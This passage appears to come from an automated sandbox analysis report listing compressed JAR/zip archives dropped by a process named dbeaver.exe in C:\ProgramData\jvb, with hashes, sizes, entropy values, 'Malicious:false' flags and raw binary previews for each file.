      SHA-512:A731EF7BB1453DF6E23E3EBADDF67A8208E93FB525719E61C2D192D1003EC0D5639A97E1F0C7E8BEC62910AC198930988D99DACB41CD09EA65D3A8D7119BDF03
      Malicious:false
      Reputation:unknown
      Preview:PK..........cX................META-INF/MANIFEST.MF..Y..J...j...J.J.(..8..@PT..p.;..Z..n.......,c.d.U._w...S+........$~.4...~.C.6q.5=..].~_3`..*l....F...v.Z.|..6.r..0......p.[.g.....I.Y.}6.A.&."./.*b..g.f}..n........".maP..y.X.^.|D/#;..s=. ..?@.........W.c?...<.....^.Sov.....!..5..."..,8.....7....:..w."M...-.`......[.......YQ.-.....*...."P...:..H1.;..u..f...kpr...C..I.......q...'..\..I.}.O...$.u.M.7{N..<zA...z...`............>=.=N.....?..t=6..?.....{.b.Z..C....#..:@...........b.).\+.Ju.F..N?.H...NM.>-..Ju.O.ew.<.....f........vk..=.........4.|..(..F..4...Q.k.y.q.]..^..........]q..6.....I.A.E`./.....,........<1......)N....c.....\..x.....~..F9A%...}...,....f...nsR.......g.M.W.P...E...=<..o0.{..^...5O.HXN...'..o..Z...G7t...T}...`L.AP.....4...=..2.ue4(7Z.....d...M1....X....{..T..+&7.`.\.Ak..s..MY5Ved0.4b.7U...$.........?/...x3....FE.;...._EC...s0..bY....83^U....J....;....l..?..gB..X.c.... ..&..A..6.|./....{..%..{....c.oT..UKl.|:...jo...(.6..=.+........L..2
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):75164
      Entropy (8bit):7.9230958184977505
      Encrypted:false
      SSDEEP:
      MD5:CC9CBD45EC84C8DD0C13AD0F1F08A319
      SHA1:E1EA929EDFB8AD2F3EC580418B3C9360784654A8
      SHA-256:D97D88F6E4F9E0F969718566FC6DA709E97C9BD1BB0940C524B59969E595EA21
      SHA-512:75A1C88F51690BF89FCA1C3A48B0E9B3AA73A29AC2FB4EED416EBA4EE11C937A0CFE0395459DAFFE56F0726448FDF18450B8D86AED0386A3647F4F1D2EB93CB7
      Malicious:false
      Reputation:unknown
      Preview:PK........!.cX................META-INF/MANIFEST.MF.W..H.}/....j...Sf7.Z%.Yl..f.//.....fV..7...s.5...RF.'Nd...$.....y.....6D...*..G.;>..t.E........Gq.%P......#.>=x..5.az.......i.../...;..0.a.a.........y.aT....M...S.F.v...4..}i....(..]..7._..... .e..\......P.....nZ....>.=.x...[.5(.c..g..D.k..V.T.9||....t.0+..Ms8...C....H.......oVx.../n..........hX.~...@Qh..?=.0.9K..Q...._............i~.7..4...>..W}........2..QX.AM. .B...' ....._...=K.......:.1.._....>..W,....W,..e.....<.A..`;t_.r.g.'.85z......F.1h..../..Z..V.`..n-.*?'...+...z.UA...q...d..Y(..,.W. S1..l.Q<KV^7G.P]..W....*/.X..z...&N...Rn.B0.ePq.?..$......J..FxV.C.. ..........B....6..F......"7..D..~VK.eP.&W....Q...e.W|q.. ..mi.M...':V.1.R.rE,.m.)6S.gc.Z.>.......0^.WL.....RU....\.\.b.....y~J7.....<.1....2........z...?os..g..HU.Q..w...L.6.K.f.0..<A~.X.....iC.&31f.J.......F..1N....s.....8*'se............(.l6.Ta|mj9....WB.I/8.x.{........<.`^.../HR..D..:....a...&q.R.."t.RM.@=.6..Pe...].+.va.6W9
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):454720
      Entropy (8bit):7.914885926993643
      Encrypted:false
      SSDEEP:
      MD5:8399574D438A7CB1951EE2CED8FFB314
      SHA1:4BDC8C1298D93104A90749E6FE5044BCF72793C6
      SHA-256:68CAAE46C1DFE56B7F77B49E9BBBFF3ABE3F83FDB2BBEF8B87505A622D167AF4
      SHA-512:53BCC8DAD9337E33C60A473D0BDEC66E9649E2BA859592E3FD78B695B1A8E3C1A57C00F3F21EE158AA850FE82C4E18F70D5639B7364C86A5E98FF458D3A993FF
      Malicious:false
      Reputation:unknown
      Preview:PK........'.cX................META-INF/MANIFEST.MF.}Y..Z..{I...ZGW.Obl.P.......L~)a...~.........GV.>......k..h.-.0h...i.........F.I..%.._.%...I....j..6...._...".....w../I...QM.v...u./.<.K~Y....o_.A.W.?........./..F.......}.O..........Y._...4..>..6).<.U..5}.j..Z6_V_0....t.........}......%........t./...../~~.B.z{.e.sw...7-.....z..y...K.|.&...e......E.V}....W....?|......?.i..../....'-W.$....Q.....9.n..?.`Y.j...uO.......'=v..DI.5.._..XX.'>...w....O..IU.~9/...M.;$..GG.n.n...es..U.R]/s.w8..,+xUQ....../<.u7...s..j...9wo..E/.I.7/...<..{....#.{b...[n.........'.x...I.[.._....#..*.......).{...`.{q_x......'\.\.......?_..Sp.Wg..?.g..Oh._.........m!.i!.e!pY.....T}P..@..c0v../....7}G..F..$Z..?.......c.nVu.a/....}.9"..N....D.....\.>J./c.....}~.zX....i...-.1v.t.l..."?.-.~..Wz.Wb.>.{....0C.<...9:......@84.s.....bC.,./...b.Y8.n...m..........!..:*..\..7..r=..*..L.....O.......G..z.........sp.,k.k......a ..~...5.T..Y.d.(.G..jP.....g.<.....m...
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):32419
      Entropy (8bit):7.82314002278276
      Encrypted:false
      SSDEEP:
      MD5:14C8749D8F908D34A9CA54127DA6DCE5
      SHA1:FDE8BD68D8B1B9C301B989C316B94A35DB99ADAD
      SHA-256:B31DA36F48B20DCFFF193F271FB33B8984D8A4A99308A84D08CB521C1A74DCA4
      SHA-512:98814226052A0D563477991132F2F8A643E2C87044A0CEF3EE8D632B9A8DDF97CCC2D993068E609E2694C6F747CB2D24EFC25F17ABF5DE80DFADC025195A441B
      Malicious:false
      Reputation:unknown
      Preview:PK........J.cX................META-INF/MANIFEST.MF.V[s.J.~...`m.sj.\A.<../.TD...`...3...A.I6.gS.....{f$.5....F..W..r>'..5KC.).BhPc.."....2_-W...Q=G..p.+.:......s.....wv!.M........K........f.O.\dd!Ad1..0f.7.{... .`....F..BB..(~....~.s.Q..i.R..8Q.p.G....(..,,C....tK#. ..>.e....q.G..'W>Wx.........k.B|..zo|...0.D(.7.....@.. .?....).YwA...76L.9[..}.SlW.t...X..2..<{..........fz.b....j............p=....@.........8...km....j...MG....v.. z......... ...s1.....xJzW..z..@~`]...)$...a.......~g........1.<..(I.._f...LO..@G.".k.-Z...69.......|=.. .3...$..{....|...v...B>...|n.o..Z..E.=X..-9..2.....N.....Xl....V.pZP....y...r`O..3..r`.9.1b."..m..)..A.........I.h{q.m.e..{.Ko/.s....(...4..9......kd].L...f........2dWa..At....4.....3..JKV..S......!X.b......$Z).h..%...h:..rt.*....x.U;.D.!......mb........../.=Co.'j.../..[me..gf..c.(..Z#P'..W....D....z.^T..~[..:..........T........>....*.)~.j.:....Q.. x..~.l...5L.#.u.H_......j<.c.)..yeQ....f.S.o.k#.6.8.....Hr...xI
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):240364
      Entropy (8bit):7.938385620250509
      Encrypted:false
      SSDEEP:
      MD5:4C21F309FACA55A3B17212EA945D74FD
      SHA1:ECB4B8BC60034CDE9DD323616E65F9444649A9B9
      SHA-256:EC29D9B1AD21A3AF53461729F2D4DB9042F6DD035A57DFA0DB0D36CC52C57251
      SHA-512:23BB8257349423A3A12D49E3B4A6D955B8D1E2E8E88276CDB1B7A4E6916AFB6F9DAB06B0EF63B49768633FBF867566F8D82FBF291C975682FA48FB3BB70AE85B
      Malicious:false
      Reputation:unknown
      Preview:PK........$.cX................META-INF/MANIFEST.MF.Zi..X...R......J..0=j.a...j.._Z.f....?2.*+.......d.%..F.8q...2...h.m.T..B..._.C.... ......?.."..W... ."....v.q;..k......I......>...... .?..F~..~y$..c....G.\xU...Tm..fI.=|. ...n.'....2..~...};|.........;.0..o|.-sx./.A.V8.......!.~..]..Wm...e.....b+. .?........e.&.w.1p{.!N...s.R.?tM.o.*..Z...wU.2.....)+..[......9.j......1..]....._.>.B.}U,..?.U0.8.mO|....U..T\?s......~z.L...y.3./=ta.../......<..KT].<....%....?......{....j...9>........../.~y...i...W.....r.`..+........K?.2..7...u..?.../......]./..._...,..3.Q.\;........=ZB,...q...n.....8)..E....dNT~.1.1.SN.5l4........y....X....~..U.].}.....MJ%w.[s......r)..Q .d..H....+.j.A........_.y....1J.E$.:.....!c...^....S...-.....0.%.....O.f.NOP....hp.rp..@.......b..b..F..VV3FU......-.G..D..z...#p.........:_....w.Dw.<...Wi..r.s.$._o Bs.....j...Gy.T..m%....^Z].....z.O!.j......Sox..Dfv.h...m.U.xe/..A..yF*....).....h....]....di.0G5.q6.8...o53...!..S)
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):36547
      Entropy (8bit):7.85258427860049
      Encrypted:false
      SSDEEP:
      MD5:BBE79C200AE4215022FCC3F995FA0E4D
      SHA1:C5B3D07DA277A2E21738EAE2921D4BE95F83D46B
      SHA-256:2658E3F951F04C13FBB603E12D9810BFE93E3125EDB988CE92B2C3ED8CAB6F5C
      SHA-512:C86E06A6EB7E57533E2BE489FA922D9BA293B4E18953EA5079A31CB8195D0F67A841D9096C0147816E986B01BFEF98997DA3A721CCADA6D7D46D1E7B8F9915DC
      Malicious:false
      Reputation:unknown
      Preview:PK........-.cX................META-INF/MANIFEST.MF.V.n.H.}G..Pk4.V.lc.%.<x...1._..]6.W.......I...k.[..{.....90I.K.....5.AV+R.|...^]..U.r.gs...Z.l2$M...d.u.x_.M.r..(.Vd.A.._.,.}X.. _.....<a(....kb..!.-z........sn....CI.xE.....o52.=A....yHq./U.w.....}='..A..J..u...... ..M..s.......3.a.\.\.Z>..X...Y....J../A....I....PQx.N...r..*.(I..J.*..2.9r...(J.>yr.......t..'.^=.#._....>:=...u.W.:.O.!a>.T+b.FA.a...]f..o.. .&.QZ2...T.~w.).........=h .z....<(.....j.Z....x...Q..g<"CD.`..g.........$.V..Xo.....9...=8..H/).p.g.xq7.7 ..(|.`..c....;.......!3.IR.H.1.b.S..0.b....4./Y'..K..I.7.x........7.|..Y.r.....g...Ul..#;.....a...q..f..Z.7..........!.....S.)L.F..I.t2..z.y..$.{G...8...xm".m.....l.H.%U.v.q....=A...r...E..6...-$.}.4..?...H....+.1.].W......4....-.8}.f..1.....4;"t.N...T....c(I.IH...b.b...V.3.L9!W.(.@.......8..-k.....%g..#.q..u...L.G|...O_.{..&...u.+u1..J.)1...".'z..9;..2...H..a_S...7.....h...?.4..r4KwP......`k|.....a...E....d.P..=...+......3/.c..
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):42298
      Entropy (8bit):7.89523236552149
      Encrypted:false
      SSDEEP:
      MD5:E39E0179E722EA51D66F5DC80C5EA0B2
      SHA1:5521C8487834773F3B83945A6AB995435A1F531E
      SHA-256:AA3EC1103F2DBB7B4E90168C3099134A579EAF5A68DC40B0513E2A95E2F951B9
      SHA-512:CEB95D274242EB822F3328D82A3355A0B63FC7413F512233136BB9D05323AB37087D80CA5EAAF91C5723E92434FC7266F62A542C51B781601FC1DF82FFC7C4C9
      Malicious:false
      Reputation:unknown
      Preview:PK..........cX................META-INF/MANIFEST.MF.V]..H.}7.?.y..(...dE.FAQ.._:..X....._Z{..tk..#.{.9.T..b..4.?C.".?...S..9......f..r..s.B[.P..N`x.g[..:.....@....p..%.d..........|%.....'...:.....0.5.{0.......r/pL..&Di..I.......NQ.D0+i.3..k....,.5~.vF.`.A..R.U.P....G../.[-.0....j.7C{....k..;.8...{.....$...."t:.~.M.ZW.}:b..v.j..gx[".ziW~..?.R$.du..!..@7..1.....pP..R.N...o.L.$......m.q...T~|._L.d[?~|.V..K...qJ_(^^.^......$....S..f...24..%..@=!.px...7.?:..I@.Pi.d...=Z.iM...G......6.XQ.5g.s..(&..Y...yJ$TH!(.S.1..A7W...bi.}6.~3...zSA.../.-..L...6........&.1.Fmj;[....3.Co..0....q4.O'O.?..eV.....sK..d..[F...i.h..../9.E.../........7...H2.?Q.36.A..k-?.kF.Z...+IUd...a.M.A>....s..~.u..y..(......e.......0..)..X._........+C.cR.F.M.4..F.......G....%...!....g..WN&.<.k....V.kz*...\>.u.."z.......Fx`...OriN....t.[j]i/)...fP.m. -.H..+uH.>...".E....+.yxW*..}.BG\.*....4..b~4.F..M.nv....'R.e.2.g.-...[....o.L...I.F.x.,.5.^+...Z...._.3....-..^..mm9P..]&.........M.....~w$H..P
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):37545
      Entropy (8bit):7.876831155878486
      Encrypted:false
      SSDEEP:
      MD5:5FC242ACBC3B24B9E2FA942473ED2336
      SHA1:014EF44105613B6DCBC577632908DEFD09D284CC
      SHA-256:E17252206569136D077F3536A8ED53D224D472FE89DD67AF1DFD244AF7D609A4
      SHA-512:D9E07246DCBF0182A683355F0EEFCE1C177FD16705191A09C3004123E5EE3ED0FB89C50DC7C906DB13A9FB9B90B4C48FA5A3AAE634EE13E5187AF3ED42F8A1F1
      Malicious:false
      Reputation:unknown
      Preview:PK..........cX................META-INF/MANIFEST.MF.T.r.Z..[.?X=..]....te....A@.NR<.x.8.K../1...t..=...^{...nA.7u.F..w..N.kl.].9..M5.V..]b...].").l..V.~...l~.M`. .!....1...l...hJ...1U...3.=.4....4X.,...X...g".Z/.(t...F.~..Y...9>.....A...K..8L@..~x|.....\.....h..*..*.X1L....A.~..j...pL`../p/ .ra.....5f..lX.F..|..P..Y..*.....!>.VZK.R....$...V]...y...._..0..3d..,..w..U...|D.-.'.sI..$1....)!;...o.qF`..q..EN....-O..w.....5v?1RC..|O_.~.....^..*F..H.2.%#qa$.H@......@........B..0. ...1.:.......Ag.(....c...K.S.O'......YL.)...&$p...x...V&.Z/.'...n........n....![.D4.X..y....O6.T.,.'*h.. ..A.u..X.M.{K...il...:.........".'...m.<.3I...........fi./=P.t.W..TE61.`...>.:...f.8.|./3ki..v..eGt.o...O..)Y<M..#9.F..=.M.d.BS.{.i...q./.".:_......kD...f........4.pIZCN...T......<"L.;........ z..v......s.....=.#.a..]..".._.R..-t..I..w.%........r.......m..t.d.....-I..L.B'.`.s..%E).....U.[.mz^S..#9.8h9A.n..Snwdv.....nD.<...:.6.....QE.."...\...YV^`#.......9..B.I9vXu..K.B..
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):67194
      Entropy (8bit):7.939329053655544
      Encrypted:false
      SSDEEP:
      MD5:9EFE8B8CAF43C3A91E284B05519DEDE1
      SHA1:FD9A97D1161063F385CE0F4021A1F94AEE316157
      SHA-256:F8AF010BE31AA7A5F7F53EEF812F8101F7F90C3F7A0FDB7B15ACA16BBDA7EDB7
      SHA-512:1E64EA68573F356832BE49AF5FEC35B3789C08E466BF2D5D9D9C0A4C61DD35EA102292479AA4D6F98BA45A0DA4B51C75EBF719D1016BD3278B9230FCCB937100
      Malicious:false
      Reputation:unknown
      Preview:PK..........cX................META-INF/MANIFEST.MF.Uks.H......kkkk.X.)jR.Z@0.....e...[.&.../:...D.......>...B..$m.a. ..5..u{#f(p.Cw.4#....5...]....b)..p/.iS.....A....7R.A..w.b...lj/......5..).1...`CD....jh..9..6...=..~k.CI.z...e#...z...>*..=.q...%.Y..o~.... H`._.:..;o.N.r...L..j..8Toj.....p..7....:.....s.6U]!...I..r{#d)...N..@vn.u.7r..8mN.......^..i."Z.c./..j. ..#.....ts{3....a.{K...a.c...(A6.PZ.=...H...}...........0.Avj...._.\.~IMpx........-.......@.^v.8.Q..{.....=...//k....).................&.k.....b.V....G...f...|.5VL.K..l..........kCx.0......-...... .Q.*.....]....iD..Xme..NX.E......r.N.#F..U....Si...<..a5.J@.\..;..y....sRQ.U...*...8kE1.`."...4.K..iW.zHc.WX........2.U..D..T..<..|.(Y...<..y..... ..#8B..1.k.!.......X.h.5.y..rgb..$.uN.BCH....L.Y.".Y.^..^.L.....B{.{..-G..R.;+Q..ba.h.....n.!..h..n!J......i>...L...].....y...-........l~."..r&\....\..t..e.W.....6Ac.g..v..5..#e(N..Ok....Sp...&D.P..].8....u}y.8..].....W..._.Y..N.C.G...
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):17076
      Entropy (8bit):7.819672264517777
      Encrypted:false
      SSDEEP:
      MD5:4A6A0312306FBA9CF4A455E5E58C8FA9
      SHA1:926DAAAE3FAC1CA096E0AE5B205F3A17899EB7F1
      SHA-256:D1BF24C0C6C3DE797114124887939B1716BEAB23118E34674CE26B711E1389ED
      SHA-512:2B3CE325D0F7925B9C64402AFF012F733AF37AB8A611BD3EAAB3EDE483D410CA663793A88AE832B64D754D77F5E91BF781E1430168D073966B70580BB746FC93
      Malicious:false
      Reputation:unknown
      Preview:PK........H.cX................META-INF/MANIFEST.MF.S]o.8.}G.?D....@..e...XJI.......\RS..v.._..cRDYiw4.....{.mD..D....f...F!.iIL.....N..*V..&8..V,..R.dV...Do..Z....70.f,.(..S.%i@@...)p1.zA..v..F....^...M...g.yL.z............/....LC...j$\B:.R.a....c... .z[iJ....1.%..NL@..G..G.q0...Z..k.....@>]]...pF:......N....R......./@.:w.I.,B.......i...t...`.r....b.4`..N...."H..(y.kF6....$_.Y . ..s?|.P.<Lp.x0.*].m......r......r:.w.....z..%..fN.1.!..{D.........C......j'.t.?*.........a...{..-.A......JE..".V.W*..*...?..2r.......d. e...Ot../.@......o..s....7....$wC.`{..I.S.6.../..P|T..b4t.....oO.....h....b.~*Uv...3.my.f.J...}|.....1g1....^..""...m..f|.5...<..]cc......c...m.3..].Pr.~...l+^.[.6vs].V.]M.....^.E/.Zh.e0..5..G}XL"...4].:R9..3.2..g.=..d..dR...w&..TV\.Rs6A.*L............{.8 -..xw..=&..H.~./+|...2..{.....PK..cLe.........PK........H.cX................META-INF/DBEAVER.SF..Ko.@...;.....Z!.....z0...........Y.dw.6.>N*UQ..Z.63..ogfE......SF.t(H..l..#...QU.......J.uQ
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):113449
      Entropy (8bit):7.887006824688783
      Encrypted:false
      SSDEEP:
      MD5:DE8E049642A1111F7861674BBE0BE69D
      SHA1:37035745B26892504FB3C9248FDB0E072B1A8FDB
      SHA-256:00D9BB9B9246450258E40343AB971F875A1453C2F6993ECA5F007BA5E2B37DB8
      SHA-512:AAFF868EBA03469B3F6AF201A4F4C3B7435B3B157C081C0D2294347E5A896CF035BF1AE5A63F797B16BB5CC76246EF0F0E2093DC60612A1DCD73B515DEB73DE4
      Malicious:false
      Reputation:unknown
      Preview:PK..........cX................META-INF/MANIFEST.MF.ZYs.X.~OU..k.k..46.@JW..!...B,.e...bG......v..].f.k.w...z%9ip.euk.......r...@.A...^t......_...|.Aa..1.CH.....?.x..4........8..~xN...[..G...W.s.......7:eu.n.....1.O.........((...@W....w..~..Q....k............8%.].:=......:(.....`.......pW.i5..??.K..|}......>HA...7A...8..O....<+...Yr.g.._;..w..,..Q..M.>g..O'...2K..q.G|.U\..../.U.7r....'.....?.yP..U.........*h..f...2.3...(...;NdE..%.;e.8.......T]e..&.vdK......I../...J?.....HpP|...?...g..........>#._.......B.../..Q .M to....w.!......@..J.-YdM..X...?h<u.N..E.......21..........J.....MM....~.r..o...e.uI...;.D.I....s:.-.2...>..p0;....7...H}~........9..V...c.V....L.V.>......CI..P.ilU.vk........B.......4{.d.:..n..M...6...LYp.$i:Yzs.wsx.Qv...l#......5.2D..s......*..8+..4..(.6.+.?b..O..a..A3.-8.z..{fv...Z...-2..xN...L..2B&.IU.,f.....&.Y.%.I4..p..)B).L.zm.9....(....&.>._...,....PUU.....r.23..qu..)9..Q....H..F...@..Nu.go..*..'..U....v-...f....aVQ=.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):42410
      Entropy (8bit):7.900801431592126
      Encrypted:false
      SSDEEP:
      MD5:A77A3EBA0179D39AFE9C353EF9D65EE5
      SHA1:11663F02970C74802BF30E76C8A9EF6BE2907A19
      SHA-256:8A52661ED00CF2A4AF2DCC15A93D86A90C0BC1D15B61BB46ABDAE0ADCA65DB43
      SHA-512:EAE3A71AF7D1DBB4654FD101213A4F6F41BCC565754FF31D40EB27AA230A9671887E40607C4BED42BDD15B594333EF441682E0538655365AD417D0729C3C1C5A
      Malicious:false
      Reputation:unknown
      Preview:PK..........cX................META-INF/MANIFEST.MF..k..J...O..0...n<."3.l&9\...*.l.h..i.i.......dG..N.7-...}..p...`..3H....b......a......C'....&(..E..D...u........d.VPT.S(.....rJ\..K....O.8.P..3E%.)r.V...e/I.!.#..srD..z........|.[...!.<1..G..\.*?.z..C.A..j..E.X...m.(,......(N`.(...........%.F.pWD...D!..].?).!..9/X..P.XN?<..[....F.q#....;)eQ..r..M_...w.B......[...U ......../.}..t.....Kv6..Z...S.pw....G...s.VW*...e..y#<....K.tEy...m..;.].`....N.[..o.......9>...]...;.s..Q".0@XRq0H....xI..?.w.7....F..&`l.q.<.j..B...[.../..Q_E.C........l?.....h...9....@X.X....>......~6wy..Q.4.._t.P..@..<....T...w.$&..q.G3C......}....i.s7.{a....u.E .k'..r.w.`....kCc.9hC...j"$.Z...@N~...O_*1..?<....40Q.iQMqM6k.o...|N.h./{H...G$......./..E..Z.^..W.."z.U...x.F.*bd.._..n#.......Y..AKX..T..{..J.....>.c.{.{z.g...A`E)u.k.].Xs{....07..O...J..>emh7..7.Jf..........a.V.]......_..,..Qr.h.0.cQ.u_.G...B.............krZ..R....Y..SH..... d.v.h...}>G5./.".+..n.....(.u`t
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):14978
      Entropy (8bit):7.814941151721663
      Encrypted:false
      SSDEEP:
      MD5:9F68CF577FCD6A25A90F69A450288738
      SHA1:56B43A5C29DE8C3D6537F5B576BB603AB890FD1B
      SHA-256:44F28DF7046EDB4423F2D80BCE31E0B3742DA6FE3CE5ADB68F17D42435C77DDF
      SHA-512:1F1A8BB1601850C8E0B402909CA55955C700D998219F0285EDB21F83F81053661801B27EDEC4AB0B5F5ABE4C81717A5185EE759F894D7AF123DE1D44165152F4
      Malicious:false
      Reputation:unknown
      Preview:PK........H.cX................META-INF/MANIFEST.MF.RKs.0..{....C'..O .2.x.J ...$..k.*B6.L ...&.......O.=v...3..9...W..rt..P..{.0G...X..=.%T...N.)....-..j.).5.......$..z#...g...5@;.V#.c...c.....r.2.d.P........i......r.@*.....S..[.c..).=.....RVr.E]{.UB...,....Q.....O..fX...ElM..YP..B.!.J.)n7.....Y.d>i..*!C../..M..3.+Ek.S5.mE.....Q.....f(...d(..H...k.D.K5)0.B........D..RF....D...3u. ..../..Z.......r..@.-_]].e|.K...f.tm..nz.k.E.:.......ye...l...}.]W....tF........J.0Q9.S.......;..Z..;;..r.<.fZL.R.U.....SE..qm{2...vW....$!...=...e.u~.....`.K...@ec..s.....d..b.._Hp...R...u..x,..#=...5....\....:.H...I...Xt..&...cn.{q'.Yy|.....Bo>....Ki.}....PK..a.G.r.......PK........H.cX................META-INF/DBEAVER.SF....@.E.&....(.V[.Y..O...4.(...,..........|.'...$f.".h.+2..I....b.RQ...D....#...AA.L..{[[...X...5L.b.......|.{.F-.wwi.H.V0..3..~.Qen.......t..Qc..3...u=n&.S.......09Q<Qj?.w...4V.Y@..h.5.{...fB]..........=C4..O..LU.4Y.[....a.^s.B.4.........\.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):93392
      Entropy (8bit):7.917192329324599
      Encrypted:false
      SSDEEP:
      MD5:9925F5CC4216A3937E5260B3044C5BDD
      SHA1:B8CDE6077846082DF9886EFE257CDC4B506770C7
      SHA-256:CB9DFA916BB687F4269525373FB0FC0DDEB4616D488B690A414D640F2A5D1E58
      SHA-512:88ACAB61E1BF6D841C6AEFF853533ECDDAFD536DA9BD78DAE5415DDFD7EE7E79596609BA62AFD1B8B95C8D4C3D2DD52D1BC96594BEE35C319FF2C6BA637FAAD9
      Malicious:false
      Reputation:unknown
      Preview:PK..........cX................META-INF/MANIFEST.MF.X..H.}O).!.j...d....*i...............^......2k.7...sn.{...n...D.6(J.&...'..nV...\...._....0......0.#q....=....=pkP<....-......Y...x..F~.L...........................z/[...t.aY>}..Z..??.g..c.P...**...o.?......7. .n.....+m..N.y........."....K..TT..S...B./D....=|....P@....!X..G.].......E....b."{.q.zn...??..|.P.a.c.p......P..;..>..k..K....fi..5......_...2...=. ...>.../ P|..........[.........O.......>..~.9.C._B..C._*.t..(3.....?..-..;Cd........??.GbE.....H....#....M..p4+Z.....F.wu.....X....@.T.?.....h6W.y2"W.....;N....y..l-aX.A.E..&Om.....].....ub..z.4.8Z'..YP.....Pi....q......].c.m...h....Q..oJ..**v.X$.....[....w...;$k.'F..#=Y&lQ3..^..\......NI..6.....u..]...?....i.i....`..&>..5#.q'.i...V1gN=)o.......F0...>.k.+RY.s.%YYNmS...'.X...i$;.[pX%(~..%...8..I..@..#l.L..=..~.c(;s...Bt......~...!....%.$..gI/C.5...S...6.v.$.....G..7....2.P....5..P...7$d.....qdYL..&...n......%$.#.l~. ....h.....7....r..l..D.r
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):38105
      Entropy (8bit):7.919869552164621
      Encrypted:false
      SSDEEP:
      MD5:9C23DEE8E2F6C7447BAE5D23CB49763F
      SHA1:ECFC239636DF9ED8B8EE7960A24CFCFDB86397FB
      SHA-256:0356AB090511614A5C8427BCE218C6F2D3253F0E51138A79E6F80DE592DB573F
      SHA-512:B56A2BBC73BE9AB97DE6CA3219EFECE66F43F02322703D2C764AA883C8542A6E32E541A144A9AA7057537ED02AD12419A24D54D09ADC76BA5F9156F8CB652AA2
      Malicious:false
      Reputation:unknown
      Preview:PK........ .cX................META-INF/MANIFEST.MF..[s.H....?X...N..*..T.......h^..hI+..F._.P.=..9..Y.w.....5...L01.q...[cH.Z..w...!.-t.b.6C...X.....`Z.K7&zE.....aL..Z.c.0t..{i....^&_....9..(....VM....P.G..#..&....9...E../.f.....(....%....sL...?..z>.%.=.S......k.o...C.@...:.]....=..g&G......j....8.}...%.u.N&..Y.R{..!,.U+r..bLL......q..r...p.(. I&.?wk%...((.:D........!.-...p.T.x..............v?.{`.w.....3...o.J.r...S..d....@ .&OH.+...9.S...Lo..d.0n..../&.._...];\.u....R.u.@.H.J..U.u...fR...bI:G..s(....a..K`..J.J0..y.#v.)P.d..d.......}.Pu...:.....N7.6..0..~0ia;.B..y{.L.r.sc.qM.(.>R.f..p.Y...3..Z.....|K..&E.4.......3.X.,[,f.......++n.._C8.2.4v.$...-3vD)...M......Fs..H.SC........,8..vp.....k4b.&..8...t4I..w..D...u `-w........`.}..m.g...-......IDY..|.xT.[....^.;.(..4.....Bx.{m$[kUc........&..P......].g..S.|k..<....r.3z../U{...E..d...R......<R..O....9.....lF.....X...s...Z[.>N.&.%Cj...j..F,r.y...e...t..{......R...f..|5[+A....J..H_:.E.Q....,.sU
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):28921
      Entropy (8bit):7.885883909474315
      Encrypted:false
      SSDEEP:
      MD5:532FA1AB4B457937129A873B51EE61AF
      SHA1:52FAA6B13ED80FCDC07EE59448DC34048BAAEA80
      SHA-256:320340AFBE2988835F45DCEB7D7FCDF3DCFCD0B38F1B7218EAD14904E85AF308
      SHA-512:29F5200F0D13B674DB07C6FBC4208A74CAD4830A4E24D8F6E443871981F385A3D66E4E713D6F2FCE9C34A8ED73FBBAF26A34522A77FAC3F11DEA4E0AC4BAD486
      Malicious:false
      Reputation:unknown
      Preview:PK........#.cX................META-INF/MANIFEST.MF..[..H...M...<lf....OL./xCDQ.y9i.....n.....3........_]....V.Pf.1A.W...\:...k1}.a...I..;6E[X..9...rB.\.fS.q.e,...b...T.C@..%..=...|..o?)..j.k2-@Af.0....!3.-..r....]d^j|l......V.1e..Ctk.F.g..&.u..t*.o.>N.-...>.I..B@ ...GQ...||.o.8H.&p."..K.#.....'q.........d.V......k.z.#.\..$.j.?......9.GB.....m .o&.#....N..)...s.g.S.)1..6.0..x...|..>.&...i.'6b!|[%..q....k....../.......t*....nh#......+2|.....j-.jUqYUV.XX..(s.eG.;H.s.dW.....`+9.{Gd.........e ..<...~f.Rv.'.M.qx....ws..e..a.}.H..(.{...........0>..2......{l...e.q.Wlo9.|O.d...5*.Q...a....h8.8.....w.M...T5.5.A+.....u..d.>is.G..F4.:.<JX...|%...S..j....Z.]..TU.y.q.....C1...]..B..U1...a...P.].e..q..o*.(.#.O./.'..Xn!.B3......t}.'.).V. h.K.=..2./..e.h.l.h..oGp...!6.....lY..}BU.b.Q]..........p.z..8.Z..H,.[7=U.....nl.....Y..y..j..(qE_.O.f`.b7;.Kf.........i.)...e.!M.iIR...=F.C.....;.(^.p 